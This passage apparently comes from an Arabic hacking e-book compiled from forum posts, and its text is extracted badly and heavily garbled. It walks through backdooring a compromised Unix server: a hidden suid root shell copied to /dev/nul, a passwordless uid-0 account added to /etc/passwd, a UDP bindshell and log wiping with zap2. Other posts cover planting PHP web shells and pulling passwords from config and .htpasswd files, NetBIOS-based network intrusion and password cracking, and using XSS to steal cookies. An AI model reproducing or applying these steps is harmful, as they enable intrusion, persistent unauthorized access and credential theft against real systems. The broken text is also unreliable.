microsoft.<strong>com</strong> , ibm.<strong>com</strong> etc<br />

..<br />

اوالمواقعالسیئهالمحتو ىكالاباحیهاو التيتسب الدین ... علىاي حل م ش موضوعنا دهه<br />

طیباحنا دلوقتي عایزین نحتفظبالموقع دهه تذكرالثلا ثاجهزهایاهم<br />

جهازك----->‏ جهاز وسیط------>الجهازالمستهد ف .<br />

اذن حنعملایه دلوقتي؟؟<br />

في حاجه انتلو كتبت exit حتطلعبرهالسیرفیر دهوتعودللشیل بتاعك و عشانترجعتاني یلزمك<br />

نفسالخطوات<br />

وفي هذه الفترهقد یحتملان یكونالادمینقدقام بتغییرالباسورداو ركببات شللدیمونالمصاباوقام<br />

بعملاب جریدله<br />

مما یؤديانتفشلالاكسبلویتفي عملها ‏..و الحل ؟؟<br />

بساحنا دلوقتي رووت و ممكننعمل الليفي نفسنا اذن نركبباك دوور یسمحلنابالعوده بعد ذلكفي<br />

اي وقت<br />

احسنباك دور هوه الهاك اتاك .. صعبان النورتون یكشفه و ممك...‏ اه =| =|<br />

ایه الكلام ده یاد یاایسر ؟؟؟؟<br />

هاك اتاك =|<br />

اس ف نسیت<br />

طبعاالباك دورزفي موضوعي دهتختلفتماما عن الكلام الفاضي ده و لا مؤاخذه<br />

طبعاالباك دورز دي عایزالها موضو علواحدهان شاءاحطهلكمقریبا ‏..لكنانا ساذكرلكمالاساسیات<br />

فق ط<br />

‎<strong>١</strong>‎‏-ازايتعمل sushi؟؟؟؟<br />

یلزمكانتقومبنسخال<br />

لكيتقوم بعمل<br />

الى مكان خفي و نقومباعطاءه صلاحیاتال suidكالتالي<br />

bin/sh/<br />

:<br />

...<br />

!!!!!!<br />

(= ...<br />

suid shell او sushi<br />

sh-2.03$ cp /bin/sh /dev/nul<br />

هههههه<br />

..<br />

..<br />

فياغلبالاحیانالادمین لا ینظر داخلالدایركتوري .. dev ولو حصل و نظر دخلهفانهلن یشعربشيء<br />

غ ریب لانفیه مل فاساسااسمه<br />

D = لا دهاحنا عیال جدعاناوي =D<br />

null<br />

<strong>١</strong>٨٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

sh-2.03$ cd /dev<br />

sh-2.03$ chown root nul<br />

نعطي الشیلالصلاحیات اللياحنا عایزینها :-<br />

.<br />

sh-2.03$ chmod 4775 nul<br />

٤٧٧٥<br />

chmod +s nul<br />

..<br />

معناهاال suid اللياحنا عایزینها<br />

ممكن میشتغل شفي بع<br />

خليبالكانالامر<br />

فيكله<br />

ضالانظمه<br />

.. خلیك معالامرالاولبیعمل<br />

كده خلصنا مهمتنا<br />

sh-2.03$ exit<br />

.. تعالى نطلعبرهكده و نشو ف<br />

بعد ٨٠ یوملو رجعنا =D تعال نشو فكدهاللي حی حصل<br />

:<br />

sh-2.03$ whoami<br />

luser<br />

sh-2.03$ /dev/nul<br />

sh-2.03$ whoami<br />

root<br />

احنا سوبر یوزرزالان بكل سهوله =)<br />

فیه مشكله ‏..فيكثیر منالشیلزتمنعاعطاء صلاحیاتال suid یعني مینفعش ن حصل علىال<br />

وفي هذه الحاله یلزمناان نرفعللسیرفیرالمخترق شیل خا صتانياسمه sash وهواختصار ل<br />

sushi<br />

A<br />

stand-alone shell<br />

ذواوامر خاصهبه ...<br />

و هو یسمحباعطاء صلاحیاتالsuid<br />

ل bin/sh/ اذن نقدرنعملالانال<br />

sushi<br />

‎٢‎‏-كیف نضی ف یوزرزمزورین ؟؟<br />

طبعاانت رووت وتقدرتعملتغییرفيالمل ف<br />

اي حدانت عایزه<br />

باستعمال المحرر<br />

etc/passwd/ و ممكن من خلالالمل ف دهانكتضی ف<br />

vi<br />

-: vi<br />

sh-2.03$ vi /etc/passwd<br />

طبعا لازم یكون عندكفكره عنكیفیهاستخدامالمحرر<br />

في المل ف ده حتلاقي سطرلكل یوزر عادي یكون علىالشكل ده<br />

luser:passwd:uid:gid:startdir:shell<br />

في حاله السوبر یوزرزبیكونال<br />

اذناض ف السطر ده<br />

uid & gid =0<br />

:<br />

dood::0:0:dood:/:/bin/sh<br />

وكدهاانت ضفت سوبر یوزرللنظام<br />

sh-2.03$ su dood<br />

sh-2.03$ whoami<br />

dood<br />

<strong>١</strong>٩٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

وال uid<br />

طبعااحنا رووت<br />

‏..لیه لانالا خ dood كل منال gid<br />

یساوي صفر<br />

‎٣‎‏-كیفتضع<br />

..<br />

bindshell ؟<br />

bindshell<br />

..<br />

-:<br />

-<br />

عباره عن دیمون شبیه جدبال telnetd فيالحقیقهالتلنت دیمون عباره عنبایند شیل<br />

البایند شیل هذا یقوم بفتحبورتاو منفذیعني ولكنهلیس منفذ TCP بل منفذ UDP<br />

و طبعابیعطیك شیل عندالاتصالبهذاالبورت<br />

الطری ف والشیقفي الموضو عانهالادمینلما ییجيیعمل سكان علىالجهاز بتاعهللتامین عاده وفي<br />

اغلبالاحیانالسكن یكون<br />

على منافذال TCP و نادرا جداانیعمل سكان على منافذبروتوكول UDP<br />

..<br />

عملیهازالهالاثار<br />

في نظاامالیونیكس ‏..عندماتقومبالدخول الى حسابك ‏..فنكاترى رساله عنداول الدخولتعلمكباخر مره<br />

قمتبهابالدخول و رقمالايبيالذي د خلت منه<br />

یعني سیادتكلو دخلتباسم یوزرو بعدكدهالیوزر ده دخل حیلاقيالرساله دي<br />

.


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

: luser<br />

sh-2.03$ ./zap2 luser<br />

!Zap2<br />

sh-2.03$ who<br />

sh-2.03$<br />

لواسمك<br />

.....<br />

<strong>١</strong>٩٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$$<br />

الكاتب:‏ Arab VieruZ<br />

$$$$$$$$$$$$$$$<br />

درس عن الShell PHP ‏(الجزء الأول)‏ "<br />

موضو عللبي ات شبي شل یشرح الطرق والخدا ع المستخدمة واوامرلینكس<br />

البي ات شبي شیل ملف یرعبكل صاحب موقع على سیرفر وحلهاسهل مما یمكن<br />

الموضوعبسیط جداًلكن سأطولهقلیلاًفسمحولي<br />

(:<br />

: الجزء الأول<br />

^^^^^^^^^<br />

اوامرلینكس<br />

*-----------------------------------------------*<br />

امر سرد الملفات a-ls<br />

:<br />

سرد جمیعالملفاتالمخفیةاو غیرها<br />

*-----------------------------------------------*<br />

امر عر ض محتویاتالملف<br />

e-catاو<br />

cat ‏(هام جدا)‏<br />

:<br />

فتح المل ف وعر ض محتویاته<br />

*-----------------------------------------------*<br />

امر حذ فالملف : f-rm<br />

لحذ ف المل ف الذيترید<br />

*-----------------------------------------------*<br />

امر حذ فالمجلد : d-rm<br />

لحذ فالمجلد الذيترید<br />

*-----------------------------------------------*<br />

امرالنسخ : i-cp<br />

لنسخالمل فالذيترید<br />

*-----------------------------------------------*<br />

امراعادةالتسمیة : mv<br />

<strong>١</strong>٩٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لأعادةالتسمیة<br />

*-----------------------------------------------*<br />

ملا حظة ‏:لمعر ف المزید مناوامرلینكسقمبشراءالكتب ولل حصول علىمعلومات اكثرلأمر من الأوامر<br />

كمبوضعالأمرثم<br />

مثال<br />

help–<br />

help--ls :<br />

*-----------------------------------------------*<br />

: الجزء الثاني<br />

^^^^^^^^^<br />

كیفیةتنفیذ الأوامر :<br />

*-----------------------------------------------*<br />

<strong>١</strong>٩٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<strong>١</strong>- ستجد مربعللكتابةقم بكتابةالأمرالمرادتنفیذه<br />

٢- هناتعر ض الملفات و المجلدات<br />

٣- هناتعر ض المجلداتفقط<br />

:<br />

٤- مكان الفلودر الذيتعمل علیهالآن<br />

٥- ضع العلامةلیخبرك ما یحد ث عند وجود خطأ<br />

*-----------------------------------------------*<br />

*-----------------------------------------------*<br />

الجزء الثالث<br />

^^^^^^^^^<br />

الخد ع والطرق لتحمیل هذا المل ف:‏<br />

*-----------------------------------------------*<br />

هناتأتي المشكله<br />

!!!<br />

لكنلیس ت مست حیله وسنستعر ض بع ض الطرقالتي اتبعهاانا شخصیاً‏<br />

‎<strong>١</strong>‎‏-ایجادثغرةتستطیع منهاتحمیلالملف مثال ‏:ثغرةالنیوك القدیمة حقت ال txt.hacked<br />

*-----------------------------------------------*<br />

‎٢‎‏-لنفر ضاننا نریداختراق موقعمعین وكان صاحبالموقع ذكي جداً‏ وحری ص<br />

هذي طریقهقدتنفعاولاًتحدیدالشركةالمستضیفة و نحاول الب حث عن مواقعفي نفسالسیرفراو على<br />

الأقلفي نفس شركةالأستضافة یكون صاحبها دلخ ونحاول نلقىثغرة نحمل منها المل ف<br />

*-----------------------------------------------*<br />

‎٣‎‏-المواقعالمجانیة التيتدعمالبي ات شبي....‏<br />

<strong>١</strong>٩٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$$<br />

الكاتب:‏ Arab VieruZ<br />

$$$$$$$$$$$$$$$<br />

نتابعالموضو ع مباشره<br />

الجزء الرابع :<br />

^^^^^^^^<br />

طرقال حصول على الباسورد:‏<br />

درس عن الShell PHP ‏(الجزء الثاني)‏ "<br />

*-----------------------------------------------*<br />

هذا الجزء سیأخذ موضو ع ال ٢PHP Shell<br />

طرقال حصول على الباسوردهي مناصعب الطرق التيقدتواجه المخترق<br />

.<br />

*-----------------------------------------------*<br />

‎<strong>١</strong>‎‏-اخذالباس من ملفاتاكسسال My SQL التيتسمىبالعادة php.config<br />

ویمكناخذالباس عن طری قتنفیذ الأمر التاليفيال<br />

الذهاب الى المجلد الذي یوجدفیه هذاالمل ف وكتابة الأمر التالي<br />

وسیظهر الباسوردفياحدالمتغیرات<br />

PHP Shell<br />

php.cat config<br />

*-----------------------------------------------*<br />

htpasswed.<br />

/passwd/admin/forum/htpasswds./site/home :<br />

swdpas/admin/forum/htpasswds./site/home/cat<br />

:<br />

‎٢‎‏-اخذالباس المشفر من مل فال<br />

ویمكناجاد هذا المل ففياحد مجلداتالسیرفر واذالمتجدهقم بفتح ال htaccess. حتىتجد مكان<br />

المل ف السابق مثال<br />

الأمر<br />

ستجد الباس المشفر بتشفیر DESیعنيتقدرتفكهبجون ذا رایبر<br />

oerdY٣oS٤nymw:user<br />

*-----------------------------------------------*<br />

٣- طریقة الأكستینشون سیرفراو : pwd.service<br />

وهوتابعللفرون تبیج ویوجدبهالباسوردالخا صبالفرون تبیج مشفر DES<br />

ویوجد داخل مجلد<br />

:<br />

tvp_itv_<br />

الأمر : pwd.service/tvp_itv_/www/site/home/cat<br />

رابط : راجع درس DeXXa الخا صبهذا القسم<br />

oerdY٣oS٤nymw:user<br />

*-----------------------------------------------*<br />

٤- لا یمكناعتبارهاكقسم لاكنكملاحظةالا وهي :<br />

ان بع ضالمواقع تتحدفي سكربتات مثلال phpMyAdmin ویكونلكن موقعاكسس خا صلدخول هذا<br />

السكربت ویكونبمل ف ال php.config یكونالرو تللقاعدةیعني یمكنتعدلوتمسحايقاعدةلأي<br />

موقعكان !!<br />

<strong>١</strong>٩٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$$<br />

الكاتب:‏ Arab VieruZ<br />

$$$$$$$$$$$$$$$<br />

درس عن الShell PHP ‏(الجزء الثالث)‏ "<br />

الجزء الخام س والأ خیر<br />

^^^^^^^^^^^^^^<br />

بماانكالآن عرفتمعظمالأشیاءلكن لابد من وجود مشاكل سأذكر الذياصابني<br />

*-----------------------------------*<br />

<strong>١</strong>- مشكلة عر ض المواقعالاخرى :<br />

جمیعالمواقع الموجودةفيالسیرفرفي<br />

:<br />

/<br />

home/<br />

الأمر ‏:قمبالذهاب الى مجلد الروت<br />

home/a -ls<br />

ستجد مجلداتكل مجلد یحوي ملفات موقع ما لعرضه<br />

SITE/home/a -ls<br />

SITE ‏=اسمالموقعاوالمجلد<br />

:<br />

*-----------------------------------*<br />

:<br />

:<br />

٢- مشكلة عر ض ملفات الموقع<br />

بع ضالسیرفرات لاتسمحبدخول home الموقعالااذاكن تانت روتاو صاحب الموقع الحل<br />

قمبدخول<br />

/public_html/tesi/home<br />

او<br />

/www/site/home<br />

لدخول الى ملفات الموقع التيتعر ض<br />

*-----------------------------------*<br />

٣- بع ض الأوامرلاتعمل<br />

هذه مشكله منالصعب حلها ویجباستعمالباك دور خا ص بكرنلالسیرفر ... اقصداصدار الكرنل .<br />

<strong>١</strong>٩٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" شرح أداة " anmap<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$$<br />

مترجمبواسطة:الهكر الخجول<br />

$$$$$$$$$$$$$$$$$$<br />

:<br />

nmap<br />

الإسم<br />

‏-أداةكش ف عنالشبكات و ماسحأمني<br />

الخلاصة<br />

أنوا ع المسح ‏-الخیارات<br />

:<br />

الوص ف :<br />

صمم هذا البرنامجلكي یسمحلمدراءالنظام و الأفرادبمسح شبكاتكبیرة لتقریرومعرفةالمضیفین<br />

وماذا یقدمون من خدمات . وتدعمالإنماب عددكبیر منتقنیات المسح مثل<br />

:<br />

.. مثل :<br />

UDP<br />

()TCP connect<br />

(TCP SYN (half open<br />

(ftp proxy (bounceattack<br />

Reverse-ident<br />

(ICMP (ping sweep<br />

FIN<br />

ACK sweep<br />

Xmas Tree<br />

SYN sweep<br />

.and Null scan<br />

الإنمابتقدمأیضاً‏ عدد منالممیزات المتقدمة<br />

TCP/IP fingerprinting remote OS detection via<br />

stealth scanning<br />

dynamic delay and retransmission calculations<br />

parallel scanning<br />

detection of down hosts via parallel pings<br />

decoy scanning port<br />

filtering detection<br />

direct (non-portmapper) RPC scanning<br />

fragmentation scanning<br />

flexible target and port specification<br />

<strong>١</strong>٩٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

:<br />

نتائجالإنماب عادةاً‏ ماتكون علىهیئةقائمةبالبورتاتالمهمهالتيتوجدفيالآلةالتيأجریت علیها عملیة<br />

المسح . والإنماب دائماًیعطیناالبورتات وإسمالخدمة والعدد والحالة والبروتوكول<br />

الحالهإماأنتكون مفتوحةاو مرشحةأو غیر مرشحة<br />

مفتوحةتعنيأنالآلة سو فتقبلأيإتصالبهذاالبورت<br />

المرشحةتعنيأنهناكفایروولأوفلتر ‏(مرشح)أوأي عقبةأخرىتغطي هذاالبورتوتمنعالإنماب من<br />

معرفة حالةالبورتإ ذاكان مفتوحاًأو لا<br />

غیر مرشحتعني بأن هذاالبورت معرو فلدىالإنماب بأنه مغلق ولا یبدوأنأيفایروولأوفلتر ‏(مرشح)‏<br />

تدخلفي محاولةالإنماب والبورتات غیر المرشحة هيأغلبالحالات ولا یمكنمعرفتهمإلافي حالة واحدة<br />

، هيأن یكونمعظم البورتاتالتيأجریتلهم عملةالمسحفي حالةترشیح<br />

وبا لإ عتماد علىالخیارات المستخدمهفيالإنمابفیمكنأن یبلغ عنالحالاتالممیزةالتالیةفي الریموت<br />

هوست<br />

النظام المستخدم<br />

TCP sequencability<br />

أسماءالمستخدمینالذین یشغلونالبرامج المرتبطة بكلبورت<br />

أسماءالديإنإس<br />

وبع ض الأشیاء الأخرى ...<br />

<strong>١</strong>٩٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

طریقة لإقتحام السيرفرات بدون ثغرات<br />

"<br />

$$$$$$$$$$$$$$$$$$<br />

الكاتب:‏ network access<br />

$$$$$$$$$$$$$$$$$$<br />

فیه طرقمعروفهتمكنك منالدخول ولوبنسبه ٥٠% علىاغلبالسیرفراتالموجودهبالعالم لاحظ ٥٠%<br />

اولا الجهماتالاولى دائمایكون الغر ض منهاتكوینمعلومات عامه عنالسیرفرالذي یراد مهاجمت ه ومن<br />

هنا نبداالهجوم وعلىاياساسیتركزالهجوم.‏<br />

احیانا یكونهجوم حرمان خدمه واحیاناهجوماقتحامكامل حسبالموجود والمتوفر والمعلوماتالموجوده<br />

لدینا..........‏ طیبلنفر ضاننا ودنا نخ ش على شركهمعینهباسم aswind.COM الخطوهالأولى هي<br />

التعر ف على مد ى عنوان ip الخاصهبهذهالشركه وهذا سهل<br />

اول شيانصحبالتسجیلفي موقع INTERNIC.NET حتىیعطونك خدما تتستاهل<br />

هناك طریقتینلمعرفهالايبي اولا<br />

عن طریقالموقعINTERNIC.NET<br />

والثانیه عن طریقبرنامجالدوسبالامر<br />

:<br />

:<br />

NSLOOKUP<br />

SET TYPE = ALL<br />

aswind.COM<br />

را حتطلعلك المعلومات هذيبالضبط<br />

Domain Name: ASWIND.COM<br />

Registrar: ONLINENIC, INC.<br />

Whois Server: whois.OnlineNIC.<strong>com</strong><br />

http://www.onlinenic.<strong>com</strong>/Referral URL:<br />

Name Server: DNS.ASWIND.COM<br />

Name Server: NS1.ASWIND.COM<br />

Updated Date: 01-apr-2002<br />

معنا الكلام هذاان شركه aswind.<strong>com</strong>وضعتارقامالملقامات الخاصه ب‎2‎ = DNS<br />

یعني عدد‎٢‎ خادم DNSوسوتلها نشریعني هناك علىالاقل سیرفرین شغالینبخدمه DNS یعنيهم<br />

یتعتقدونان الموضو ع ماراح یاخذكثیر من طاقهالتشغیلللأجهزه خاصه DNS<br />

هنافي مجالللدخولوتعدیلبیانات DNSبمعنىانالعملیهتصیر واسعه شويفقطقمبنشر عنوانین من<br />

عنواوین Ipفق ط مثل ماسوو aswind.<strong>com</strong>لكنلنفتر ضانهفیه اكثر من عنوانلنفول ٦ مثلا .<br />

عشانكذااقترح على الشركاتوضع عنواونین IPللنشر ووضع خوادم DNS علىاجهزهقدیمه وبطی ئه<br />

لأنكاساسافي حاجه ل DNSداینامیكي وهذایعنيانكتقوم بتشغیل WIN2Kوخدمه DNS على جهاز<br />

واحد وهذي من الافكارالجیدهفي نظرياذا وضعت جهاز خا صفقطبال DNS<br />

طیبلنفر ضانك مالقیت شي علىاجهزه DNS وبماانكفيبدایه هجوم هذایعنيانه عندك متسع من<br />

الوقت اذنقم بتجریب جمیعالعناوینالمتوفرهلدیك والتي حصلت علیها من HowISوصدقونيفیه<br />

ادوات موجودهبالنت مممكنانهاتمسح مجموعه IP موجودهفي شبكهمعینه<br />

طیبقم بعمل مل فاسمه LMHOSTS یوجدفیهاسم NetBiosلكل عنوان IPاستطع تانكت حصل<br />

علیه<br />

٢٠٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

یعنيانت عرف تانالشبكه منكلاس C وعنوانها ٢٠٠٫٢٠٠٫٢٠٠٫٠ سولك مل ف LMHOSTSباسم<br />

Net view وهكذا بعدینتحتاج عمل N2 فباسم = 200.200.200.2 NetBiosومل<br />

//servername<br />

٢٥٤<br />

\<br />

)<br />

لكلاسم من N1‎إلى N254 یعنيكانكتسوي سكانبورتب سبطریقهثانیه<br />

من جهاز رقم ‎<strong>١</strong>‎إلى جهاز رقم<br />

وبالنسبهللأجهزهالص حیحه سو فتشتغل الخدمهفیهاام العناوینالغیر متصلهفلنتستجیب طبعاً‏<br />

طیبانتالاالان ماتقدرتسوي شي<br />

بستقدر تتاكد من حساب Administrator موجود والا لااوتمتغییرهاواذا هناك یوزر نیمبنفس<br />

الصلاحیا تان تبطبیعه الحال ماتقدرت حصل علیهبسهوله<br />

اذنهناكابواب خلفیهللحصول علیه من بع ضالطرقالوصوللبع ضاسماء المستخدمینالموجودینفي<br />

الشركه وهذایعتبر عیب من عیون Windwosلانهاتطنشهمههههههههه مدريلی ش<br />

فیهامرتقدرتعر ف من خلالهبسألاالانانت ماتقدرتسویهلانه مالك حق وصول مباشریعنيانت لازم<br />

ت حصل على usernameلاي and password یوزر موجودفيالمجالالامر هو net user وهو<br />

یستعرضلك جمیعالمستخدمینالموجودینبالمجال<br />

لكنفیه طریقهلل حصول علىاسماءبالهبل ههههههه<br />

كی ف ؟؟<br />

الان عندما یقوم مستخدم بتسجیل دخول یقوم جهازهلیسفق ط بتسجیلاسمهفقطبلاسم جهازه یعني على<br />

سبیل المثال مدیرالشبكهاذا صار عنده زحمه یشغل خدمهاسمها مراقبه النظام حتىیعر فانه وصلللحد<br />

الأقصى<br />

عندما یقوم مستخدم بتسجیلالدخولتقوم خدمه Messenger Service بتسجیلاسمالمستخدمكاحد<br />

اسماء NetBios الموجودینفيالشبكهالي ان تاساسا جالستبحث عنهم وعلىافترا ضانك دخلت على<br />

خادم بعنوان IPفأناي 200.200.200.200 شخ صاذاقام بعمل nbtstat a-<br />

‎200.200.200.200‎سیتكمن منمعرفهاسم جهازك واسم المستخدم واذاكان جهازك<br />

MSBROWSERاو لا سو ف اتحد ث عنهابالتفصیل (<br />

طیبلنفر ضانفیه شخ صباسم John ورقم‎200.200.200.50‎ IP موجودفيالشبكهفانكاذاقمت<br />

راح یضهرلكانهفیه شخ صباسم john واسم جهازه<br />

)<br />

بعمل Nbtstat -a 200.200.200.50<br />

johnPC<br />

. (<br />

(<br />

الأن موجودمعكاسم مستخدم ‏(احتمال یكون ( Administrator طیب و ش نسوي<br />

؟<br />

قوم بتعطیل خدمه Messengerفي Service جهزك ) ولنیتمتسجیلاسمكفيالنطاقیعني بتخ ش<br />

مخفي<br />

وبالسنبه ل MSBROWSER اذا شفتها بعد عملالامر nbtstat a-<br />

هذایعنيانهاستعرا ض رئیسيللمجال وهذا مناكبرالاخطاء التي یقومونبها مدراءالشبكا تلان مراقب<br />

المجال یدو خ لا یستطیعالتجمیعوتستطیعاستغلال مثل هذه الثغرات دائمافيالشبكاتالدا خلیه<br />

طیبانتالان حصل ت علىاسم المتسخدم<br />

انت محتاجكلمه المرور وهذي هيالمشكلهیعنيانت ضمیت جهازك مع الشبكهلكن ماقدرتت حصل على<br />

كلمه المرورلكنتقدرت حصل علیها nt senstiver او مت حسس الشبكه معلی ش ماني متاكد من<br />

السبیلنق<br />

طیبكی فاقدراحصلفعلیا علىكلمهالمرور<br />

غالبا ماتكونكلمات مرورالمستخدمینتاففه جدا هاذاذا وجدتاصلا<br />

یعنيبرنامج مثل l0pthcrackیحللك المشكله....‏<br />

٢٠<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" Cross Site Scripting<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$<br />

الكاتب tcp:<br />

$$$$$$$$<br />

المتطلبات<br />

معرفةتامهبلغة HTML<br />

:<br />

اطلاع غیر متعم ق علىلغاتالسكربتینق وهي JAVASCRIPT ,PERL ,CGI ,VBSCRIPT<br />

ومن وجهة نظر شخصیةالمصایبكلها منالجافا سكربت والهتمل<br />

==========================================================<br />

الاهدا فالمنشوده<br />

:<br />

‏*افهامالقارئ عنالكیفیة التىیتمفیها سرقةمعلومات هامه من جهازالمستخدم<br />

‏*اختراقالمنتدیا ت من نو ع VBULLETINاو YaBBاوالمجلا and UBB ت منالبهب نیوكاو<br />

بوس ت نیوك<br />

* افهامالقراء عن الكیفیةالتي تتمفیها سرقةالكوكیزاواختطا فالجلسة منالمستخدمین<br />

‏*ان یستطیع القارئتوسیع مداخلالاختراق<br />

: المشكلة<br />

كما هومعرو ففان مستعرضاتالوب مثلالاكسبلورراو نت سكیب ‏...الختاتي مترجماتالنصو صاو<br />

السكربتات<br />

مبنیة داخلها ویتمترجمة السكربتا ت على جهاز المستخدمفلواننا طلبنا صفحةكانبها سكربتمعین<br />

فانالمستعر ضیترجم هذاالسكربت ویظهره على نفس الصفحهالمطلوبه<br />

.<br />

امابالنسبةللمندیاتاو مجموعاتالنقا شفانهاترف ض مثل هذهالسكربتاتوتعتبرها خر قللخصوصیة<br />

اوقدتستغلفيا غ را ض سیئةلسرقةمعلوما ت حساسة منالمستخدمین<br />

المثالالتالي یوضحكیفیةادراج السكربت<br />

:<br />

٢٠٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

message. Hello FOLKS board. This is a<br />

malicious code<br />

end of my message. This is the<br />

انكلمة maliciousتمادرجهااو code حقنهافيبین علامتي السكربت وقدتحتوي علىكود خبیث<br />

یسرقاو یرسلبیانات ‏...الخلذلكفان مصمموابرامجالمنتدیات ومطوروا یمنعونهاالااذا مكنهاالادمن<br />

اوالمصمماوقدیتماستخدامهااذا مكنالمنتدىتفیل HTML مثلایتمادراجالسكربت مكان خاصیةالامج<br />

img>document.write('<br />

؛'HREF="http://example.<strong>com</strong>/<strong>com</strong>ment.cgi? my<strong>com</strong>ment= A><br />

here Click


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

هنااستخدم نفسالسكربتالسابقلكن هذهالمره طورهاكثرلیكون مستخدمافيادراج مل ف من موقعاخر<br />

والذي<br />

هوبالاسم BADFILE ولان مصدرالبیاناتادخلفیه عدة مصادراخرى عن طریقالسكربتالمذكور<br />

فأن هذاالهجوم<br />

یسمى ب cross-siteاو scripting الترجمه من عندي ‏"برمجة عبور الموقع ‏"لاننا عبرنا<br />

باستخدامبرمجة<br />

السكربتات اكثر من موقع واذاكنتتلاحظفيالسیكیورتيفوكساوالمواقعالامنیهتختصر ب CSS<br />

وهياختصار<br />

ل scripting cross-site ولیس ل<br />

CASCADE style sheets اياوراقالانماطالمت الیة<br />

قد یدخلبدل الوسماو علامةالسكربتاي من الوسومالتالیة<br />

and ، ، ،<br />

ومنالممكنان یكونهناكوسمالنماذج من وسوم HTML وبنفسالافكارالسابقة یمكنتنفیذ<br />

الاوامر<br />

منهالسرقةالكوكیزاوبیاناتاخر ىاوتوجیهكلصفحاتاخرى<br />

اذاكنتقرات ماكتبته عن التكویدالسداسي عشر والیونیكودتستطیعالانانتفهم مااقصده<br />

=========================================================<br />

ولمزید منالتفاصیل<br />

http://www.cert.org/advisories/CA-2000-02.html<br />

:<br />

http://www.perl.<strong>com</strong>/pub/a/2002/02/20/css.html<br />

...<br />

٢٠٤


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

كود تدمير سجل الزوار<br />

"<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$<br />

الكاتب:العبقري<br />

$$$$$$$$$$<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

.<br />

كود صغیر جداب حجمه،كبیر بقدرته علىتدمیر سجلالزواربالكامل...انتمتعرفون طبعاكیفیة عملتوقیع<br />

في سجل الزوار،‏ الأسم ‏-الأیمیل - موقعكالشخصي-‏ تقدیركللموقع - طریقة الأستدلال......والنقطه المهمه<br />

وهي كتابةتعلیقك على الموقع؟؟؟؟؟؟؟<br />

ن حن سو فنضعكل شي حسب ماهو مطلوب ولكن عندما نأتيلكتابةالتعلی ق...........نق ف ونكتب :<br />

هذا هوالكود<br />

:<br />

==================================================<br />

h3>put your text here


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

شرح شبه مفصل عن الثغرات<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$<br />

الكاتب icer:<br />

$$$$$$$$<br />

الموضو عالیوم ینقسمالىالتالي :<br />

- <strong>١</strong> كی فتجد اكسبلویتات ؟<br />

‎٢‎‏-كی فتستعمل الاكسبلویتات ‏(دعونا نسمیهااستثمارات ‏)؟<br />

انوا ع مختلفه منالاستثمارا ت...‏<br />

مواقع مفیدهللب حث ع لالثغرا ت...‏<br />

-٣<br />

-٤<br />

××××××××××××××××××××××××××××××××××××××××××××<br />

a face at the interface :<br />

الاستثمارا تتستخدم عادهلكيت حصل عل الرووت عل نظام معین ‏..والرووت هو عباره<br />

عنالادمینیستراتوراو مدیرالنظامالذيتریداختراقه...‏ الاستثمارات دایما ماتوجد<br />

